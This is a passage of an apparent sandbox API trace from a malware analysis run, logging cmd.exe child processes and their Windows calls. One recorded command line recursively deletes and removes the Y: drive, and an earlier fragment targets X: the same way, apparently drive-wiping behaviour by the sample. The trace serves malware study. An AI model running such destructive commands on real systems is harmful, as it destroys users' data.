_wcsicmp (_String1="p IN (\"X", _String2="CMDEXTVERSION") returned 13 [0066.192] _wcsicmp (_String1="p IN (\"X", _String2="CMDCMDLINE") returned 13 [0066.192] _wcsicmp (_String1="p IN (\"X", _String2="DATE") returned 12 [0066.192] _wcsicmp (_String1="p IN (\"X", _String2="TIME") returned -4 [0066.192] _wcsicmp (_String1="p IN (\"X", _String2="RANDOM") returned -2 [0066.193] _wcsicmp (_String1="p IN (\"X", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.193] GetProcessHeap () returned 0x7c0000 [0066.193] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d57e0 | out: hHeap=0x7c0000) returned 1 [0066.193] GetProcessHeap () returned 0x7c0000 [0066.193] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7daaf8 | out: hHeap=0x7c0000) returned 1 [0066.193] GetProcessHeap () returned 0x7c0000 [0066.193] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4008) returned 0x7daaf8 [0066.193] GetProcessHeap () returned 0x7c0000 [0066.193] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7daaf8 | out: hHeap=0x7c0000) returned 1 [0066.193] GetProcessHeap () returned 0x7c0000 [0066.193] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d6ae0 | out: hHeap=0x7c0000) returned 1 [0066.193] _wcsicmp (_String1="if", _String2=")") returned 64 [0066.193] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0066.194] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0066.194] _wcsicmp (_String1="IF", _String2="if") returned 0 [0066.194] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0066.194] GetProcessHeap () returned 0x7c0000 [0066.194] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x58) returned 0x7d3110 [0066.194] GetProcessHeap () returned 0x7c0000 [0066.194] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xe) returned 0x7cffc0 [0066.194] GetProcessHeap () returned 0x7c0000 [0066.194] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x20) returned 0x7d57e0 [0066.195] GetProcessHeap () returned 0x7c0000 [0066.195] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7d57e0, Size=0x16) returned 0x7d1800 [0066.195] GetProcessHeap () returned 0x7c0000 [0066.195] RtlSizeHeap (HeapHandle=0x7c0000, Flags=0x0, MemoryPointer=0x7d1800) returned 0x16 [0066.195] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0066.196] GetProcessHeap () returned 0x7c0000 [0066.196] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x58) returned 0x7d3170 [0066.196] GetProcessHeap () returned 0x7c0000 [0066.196] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x14) returned 0x7d31d0 [0066.196] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0066.196] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0066.196] GetProcessHeap () returned 0x7c0000 [0066.196] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x12) returned 0x7d31f0 [0066.196] GetProcessHeap () returned 0x7c0000 [0066.196] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1c) returned 0x7d57e0 [0066.196] GetProcessHeap () returned 0x7c0000 [0066.196] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7d57e0, Size=0x14) returned 0x7d3210 [0066.196] GetProcessHeap () returned 0x7c0000 [0066.196] RtlSizeHeap (HeapHandle=0x7c0000, Flags=0x0, MemoryPointer=0x7d3210) returned 0x14 [0066.197] _wcsicmp (_String1="del", _String2=")") returned 59 [0066.197] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0066.197] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0066.197] _wcsicmp (_String1="IF", _String2="del") returned 5 [0066.197] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0066.197] _wcsicmp (_String1="REM", _String2="del") returned 14 [0066.197] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0066.197] GetProcessHeap () returned 0x7c0000 [0066.197] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x58) returned 0x7d3230 [0066.197] GetProcessHeap () returned 0x7c0000 [0066.197] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x10) returned 0x7cffd8 [0066.198] GetProcessHeap () returned 0x7c0000 [0066.198] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x28) returned 0x7d3290 [0066.198] GetProcessHeap () returned 0x7c0000 [0066.199] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x58) returned 0x7d32c0 [0066.199] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0066.199] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0066.199] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0066.199] GetProcessHeap () returned 0x7c0000 [0066.199] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x58) returned 0x7d3320 [0066.199] GetProcessHeap () returned 0x7c0000 [0066.199] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x44) returned 0x7d3380 [0066.200] GetProcessHeap () returned 0x7c0000 [0066.200] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x14) returned 0x7d33d0 [0066.200] GetProcessHeap () returned 0x7c0000 [0066.200] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7d33d0, Size=0x12) returned 0x7d33d0 [0066.200] GetProcessHeap () returned 0x7c0000 [0066.200] RtlSizeHeap (HeapHandle=0x7c0000, Flags=0x0, MemoryPointer=0x7d33d0) returned 0x12 [0066.200] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0066.200] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0066.201] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0066.201] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0066.201] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0066.201] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0066.201] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0066.202] GetProcessHeap () returned 0x7c0000 [0066.202] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x12) returned 0x7d33f0 [0066.202] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0066.203] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0066.203] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0066.203] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0066.203] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0066.203] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0066.203] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0066.203] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0066.203] GetProcessHeap () returned 0x7c0000 [0066.203] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x58) returned 0x7d3410 [0066.203] GetProcessHeap () returned 0x7c0000 [0066.203] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x14) returned 0x7d3470 [0066.203] GetProcessHeap () returned 0x7c0000 [0066.204] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x20) returned 0x7d57e0 [0066.205] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0066.207] GetFullPathNameW (in: lpFileName="X:", nBufferLength=0x208, lpBuffer=0x43f518, lpFilePart=0x43f2c4 | out: lpBuffer="X:\\", lpFilePart=0x43f2c4*=0x0) returned 0x3 [0066.207] wcsncmp (_String1="X:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -4 [0066.213] GetFileAttributesW (lpFileName="X:\\" (normalized: "x:")) returned 0xffffffff [0066.213] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.213] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.213] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.213] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.214] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.214] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.214] SetConsoleInputExeNameW () returned 0x1 [0066.214] GetConsoleOutputCP () returned 0x1b5 [0066.214] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.214] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.214] exit (_Code=0) Process: id = "45" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42940000" os_pid = "0xbb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"Y:\" del /f /s /q \"Y:\" & FOR /D %p IN (\"Y:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 73 os_tid = 0xadc [0066.312] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ffdec | out: lpSystemTimeAsFileTime=0x3ffdec*(dwLowDateTime=0x5563500, dwHighDateTime=0x1d62400)) [0066.312] GetCurrentProcessId () returned 0xbb4 [0066.312] GetCurrentThreadId () returned 0xadc [0066.312] GetTickCount () returned 0x1148028 [0066.313] QueryPerformanceCounter (in: lpPerformanceCount=0x3ffde4 | out: lpPerformanceCount=0x3ffde4*=18644599752) returned 1 [0066.314] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0066.314] __set_app_type (_Type=0x1) [0066.314] __p__fmode () returned 0x770331f4 [0066.314] __p__commode () returned 0x770331fc [0066.314] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0066.315] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0066.315] GetCurrentThreadId () returned 0xadc [0066.315] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xadc) returned 0x60 [0066.315] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.315] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0066.315] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.316] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0066.316] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ffd7c | out: phkResult=0x3ffd7c*=0x0) returned 0x2 [0066.316] VirtualQuery (in: lpAddress=0x3ffdb3, lpBuffer=0x3ffd4c, dwLength=0x1c | out: lpBuffer=0x3ffd4c*(BaseAddress=0x3ff000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.316] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x3ffd4c, dwLength=0x1c | out: lpBuffer=0x3ffd4c*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0066.316] VirtualQuery (in: lpAddress=0x301000, lpBuffer=0x3ffd4c, dwLength=0x1c | out: lpBuffer=0x3ffd4c*(BaseAddress=0x301000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0066.316] VirtualQuery (in: lpAddress=0x303000, lpBuffer=0x3ffd4c, dwLength=0x1c | out: lpBuffer=0x3ffd4c*(BaseAddress=0x303000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.316] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x3ffd4c, dwLength=0x1c | out: lpBuffer=0x3ffd4c*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0066.316] GetConsoleOutputCP () returned 0x1b5 [0066.316] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.316] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0066.317] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.317] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0066.317] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.317] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.317] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.317] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.318] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.318] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.318] GetEnvironmentStringsW () returned 0x4f20f8* [0066.318] GetProcessHeap () returned 0x4e0000 [0066.318] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xaca) returned 0x4f2bd0 [0066.318] FreeEnvironmentStringsW (penv=0x4f20f8) returned 1 [0066.318] GetProcessHeap () returned 0x4e0000 [0066.318] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4) returned 0x4f1898 [0066.318] GetEnvironmentStringsW () returned 0x4f20f8* [0066.318] GetProcessHeap () returned 0x4e0000 [0066.318] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xaca) returned 0x4f36a8 [0066.319] FreeEnvironmentStringsW (penv=0x4f20f8) returned 1 [0066.319] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fecec | out: phkResult=0x3fecec*=0x68) returned 0x0 [0066.319] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x0, lpData=0x3fecf8*=0x0, lpcbData=0x3fecf0*=0x1000) returned 0x2 [0066.319] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x4, lpData=0x3fecf8*=0x1, lpcbData=0x3fecf0*=0x4) returned 0x0 [0066.319] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x0, lpData=0x3fecf8*=0x1, lpcbData=0x3fecf0*=0x1000) returned 0x2 [0066.319] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x4, lpData=0x3fecf8*=0x0, lpcbData=0x3fecf0*=0x4) returned 0x0 [0066.319] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x4, lpData=0x3fecf8*=0x40, lpcbData=0x3fecf0*=0x4) returned 0x0 [0066.319] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x4, lpData=0x3fecf8*=0x40, lpcbData=0x3fecf0*=0x4) returned 0x0 [0066.319] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x0, lpData=0x3fecf8*=0x40, lpcbData=0x3fecf0*=0x1000) returned 0x2 [0066.319] RegCloseKey (hKey=0x68) returned 0x0 [0066.319] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fecec | out: phkResult=0x3fecec*=0x68) returned 0x0 [0066.319] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x0, lpData=0x3fecf8*=0x40, lpcbData=0x3fecf0*=0x1000) returned 0x2 [0066.320] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x4, lpData=0x3fecf8*=0x1, lpcbData=0x3fecf0*=0x4) returned 0x0 [0066.320] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x0, lpData=0x3fecf8*=0x1, lpcbData=0x3fecf0*=0x1000) returned 0x2 [0066.320] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x4, lpData=0x3fecf8*=0x0, lpcbData=0x3fecf0*=0x4) returned 0x0 [0066.320] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x4, lpData=0x3fecf8*=0x9, lpcbData=0x3fecf0*=0x4) returned 0x0 [0066.320] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x4, lpData=0x3fecf8*=0x9, lpcbData=0x3fecf0*=0x4) returned 0x0 [0066.320] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fecf4, lpData=0x3fecf8, lpcbData=0x3fecf0*=0x1000 | out: lpType=0x3fecf4*=0x0, lpData=0x3fecf8*=0x9, lpcbData=0x3fecf0*=0x1000) returned 0x2 [0066.320] RegCloseKey (hKey=0x68) returned 0x0 [0066.320] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6c [0066.320] srand (_Seed=0x5eb34b6c) [0066.320] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"Y:\" del /f /s /q \"Y:\" & FOR /D %p IN (\"Y:\") DO rmdir \"%p\" /s /q" [0066.320] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"Y:\" del /f /s /q \"Y:\" & FOR /D %p IN (\"Y:\") DO rmdir \"%p\" /s /q" [0066.320] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.321] GetProcessHeap () returned 0x4e0000 [0066.321] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x210) returned 0x4f20f8 [0066.321] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0066.321] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0066.321] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0066.321] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.321] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0066.321] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0066.321] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0066.321] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0066.321] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0066.321] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0066.321] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0066.321] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.321] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0066.321] GetProcessHeap () returned 0x4e0000 [0066.321] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f2bd0 | out: hHeap=0x4e0000) returned 1 [0066.321] GetEnvironmentStringsW () returned 0x4f2310* [0066.321] GetProcessHeap () returned 0x4e0000 [0066.322] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xae2) returned 0x4f4c70 [0066.322] FreeEnvironmentStringsW (penv=0x4f2310) returned 1 [0066.322] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0066.322] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.322] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0066.322] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0066.322] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0066.322] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0066.322] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0066.322] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0066.322] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0066.322] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0066.322] GetProcessHeap () returned 0x4e0000 [0066.322] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x54) returned 0x4f17c8 [0066.322] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ffab8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3ffab8, lpFilePart=0x3ffab4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ffab4*="Desktop") returned 0x25 [0066.322] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.323] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ff834 | out: lpFindFileData=0x3ff834*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4f5760 [0066.323] FindClose (in: hFindFile=0x4f5760 | out: hFindFile=0x4f5760) returned 1 [0066.323] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ff834 | out: lpFindFileData=0x3ff834*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4f5760 [0066.323] FindClose (in: hFindFile=0x4f5760 | out: hFindFile=0x4f5760) returned 1 [0066.323] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0066.323] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ff834 | out: lpFindFileData=0x3ff834*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4f5760 [0066.323] FindClose (in: hFindFile=0x4f5760 | out: hFindFile=0x4f5760) returned 1 [0066.323] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.323] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0066.323] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0066.324] GetProcessHeap () returned 0x4e0000 [0066.324] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c70 | out: hHeap=0x4e0000) returned 1 [0066.324] GetEnvironmentStringsW () returned 0x4f4180* [0066.324] GetProcessHeap () returned 0x4e0000 [0066.324] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xb36) returned 0x4f5fa0 [0066.324] FreeEnvironmentStringsW (penv=0x4f4180) returned 1 [0066.324] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.324] GetProcessHeap () returned 0x4e0000 [0066.324] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f17c8 | out: hHeap=0x4e0000) returned 1 [0066.324] GetProcessHeap () returned 0x4e0000 [0066.324] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x400e) returned 0x4f6ae0 [0066.325] GetProcessHeap () returned 0x4e0000 [0066.325] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xa0) returned 0x4f2e50 [0066.325] GetProcessHeap () returned 0x4e0000 [0066.325] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6ae0 | out: hHeap=0x4e0000) returned 1 [0066.325] GetConsoleOutputCP () returned 0x1b5 [0066.325] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.325] GetUserDefaultLCID () returned 0x409 [0066.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0066.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ffbf8, cchData=128 | out: lpLCData="0") returned 2 [0066.326] GetLocaleInfoW (in: Locale=0x409, 